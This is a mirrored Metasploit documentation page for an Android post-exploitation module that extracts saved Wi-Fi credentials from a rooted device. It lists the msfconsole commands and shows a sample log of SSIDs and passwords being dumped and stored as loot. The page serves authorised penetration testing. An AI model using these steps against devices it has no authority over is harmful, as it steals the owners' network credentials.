CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/post/android/gather/wireless_ap.md
Views: 11705

Vulnerable Application

This post-exploitation module will extract all saved Wireless access point credentials from the target android device.

Verification Steps

  1. Start msfconsole

  2. Get a root meterpreter session (use exploit/android/local/...)

  3. use post/android/gather/wireless_ap

  4. set SESSION <session id>

  5. run

  6. You should be able to see the extracted credentials.

Options

SESSION - The session to run the module on.

Extracted data

Wireless AP credentials (SSID, network type and password)

Scenarios

msf5 exploit(multi/handler) > use post/android/gather/wireless_ap msf5 post(android/gather/wireless_ap) > set session 1 session => 1 msf5 post(android/gather/wireless_ap) > run Wireless APs ============ SSID net_type password ---- -------- -------- ADYYYXRoYXJ2YWpvc2hp WPA-PSK   lkjhgfdsa FCP_WiFi              NONE HomeCable             WPA-PSK   p@$$w0rd Troika               WPA-PSK   ika@12345 [+] Secrets stored in: ~/.msf4/loot/...wireless.ap.cred_...txt [*] Post module execution completed msf5 post(android/gather/wireless_ap) >